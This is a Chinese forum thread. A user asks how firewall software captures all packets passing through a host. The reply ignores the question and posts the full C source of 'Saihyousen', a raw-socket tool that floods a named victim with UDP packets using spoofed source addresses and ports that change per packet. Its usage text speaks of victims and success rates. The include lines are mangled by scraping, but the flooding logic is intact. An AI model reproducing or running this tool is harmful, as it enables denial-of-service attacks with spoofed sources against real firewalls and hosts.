请问高手,类似于防火墙之类的软件,如何获取经过主机的所有数据包,
应该不会用SNIFFER的原理.
---------------------------------------------------------------
防火墙的源代码不好找,不过下面是一个攻击防火墙的源代码,希望对你有所帮助:
#include
1<sys types.h="">
2#include<sys socket.h="">
3#include<netinet in_systm.h="">
4#include<netinet in.h="">
5#include<netinet ip.h="">
6#include<netinet udp.h="">
7#include<errno.h>
8#include<strings.h>
9#include<netdb.h>
10#include <stdlib.h>
11#include<stdio.h>
12#ifdef BROKEN_LIBC
13#include <arpa inet.h="">
14#else
15#define u_char unsigned char
16#define u_short unsigned short
17#endif
18
19struct sockaddr sa;
20
21int main(int argc,char **argv)
22{
23int fd;
24int x=1;
25int hosti=192;
26int hostii=168;
27int hostiii=1;
28int meep=0;
29int fooport=1;
30int numpack=0;
31char funhost[15];
32struct sockaddr_in *p;
33struct hostent *he;
34u_char gram[36]=
35{
360x45, 0x00, 0x00, 0x26,
370x12, 0x34, 0x00, 0x00,
380xFF, 0x11, 0, 0,
390, 0, 0, 0,
400, 0, 0, 0,
410, 0, 0, 0,
420x00, 0x12, 0x00, 0x00,
43'3','1','3','3','7','8','9','0'
44};
45
46if(argc!=3)
47{
48fprintf(stderr,"Saihyousen, by Noc-Wage\n");
49fprintf(stderr,"The faster your connection to the internet is (latency
50wise, not bandwidth)\n");
51fprintf(stderr,"and the lower the CPU speed of the victim
52will\nincrease probability of success\n");
53fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen
54127.0.0.1 40000\n",*argv);
55exit(1);
56};
57if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
58{
59perror("requires RAW SOCKETS");
60exit(1);
61};
62
63#ifdef IP_HDRINCL
64if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
65{
66perror("setsockopt IP_HDRINCL");
67exit(1);
68};
69#else
70fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
71#endif
72
73for (numpack=0;numpack<=atoi(argv[2]);numpack++) {
74if (meep==0) { ++hosti; meep++; }
75if (hosti>254) hosti=1;
76if (meep==1) { ++hostii; meep++;}
77if (hostii>254) hostii=1;
78if (meep==2) { ++hostiii; meep=0;}
79if (hostiii>254) hostiii=1;
80
81sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
82(he=gethostbyname(funhost));
83bcopy(*(he->h_addr_list),(gram+12),4);
84
85if((he=gethostbyname(argv[1]))==NULL)
86{
87fprintf(stderr,"can't resolve destination hostname\n");
88exit(1);
89};
90bcopy(*(he->h_addr_list),(gram+16),4);
91fooport++;
92if (fooport>65530) {fooport=1;};
93*(u_short*)(gram+20)=htons((u_short)fooport);
94*(u_short*)(gram+22)=htons((u_short)fooport);
95
96p=(struct sockaddr_in*)&sa
97p->sin_family=AF_INET;
98bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
99
100if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct
101sockaddr)))== -1)
102{
103perror("sendto");
104exit(1);
105};
106};
107printf("Attack against %s finished", argv[1]);
108putchar('\n');
109return 1;
110}</arpa></stdio.h></stdlib.h></netdb.h></strings.h></errno.h></netinet></netinet></netinet></netinet></sys></sys>